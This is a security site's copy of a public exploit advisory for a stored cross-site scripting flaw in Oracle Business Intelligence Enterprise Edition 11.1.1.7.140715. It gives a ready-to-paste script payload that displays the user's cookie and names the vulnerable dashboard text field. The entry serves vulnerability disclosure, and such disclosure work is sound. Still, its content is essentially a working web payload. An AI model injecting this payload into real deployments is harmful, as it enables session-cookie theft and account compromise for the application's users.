Home Tools Exploits & CVE's Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 XSS

Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 XSS

January 20, 2021

810

Authored by omurugur

Oracle Business Intelligence Enterprise Edition version 11.1.1.7.140715 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
# Exploit Author: omurugur
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
# Version: 11.1.1.7.140715
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

Stored  XSS:

“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

Vulnerable area = Dashboard - Add New Text

Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 XSS

Follow us on Instagram @thecyberpost

EDITOR PICKS

BMC Compuware iStrobe Web 20.13 Shell Upload

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

GLPI 10.x.x Remote Command Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Academy LMS 6.2 Cross Site Scripting

Chrome PaintImage Deserialization Out-Of-Bounds Read

Gerapy 0.9.7 Remote Code Execution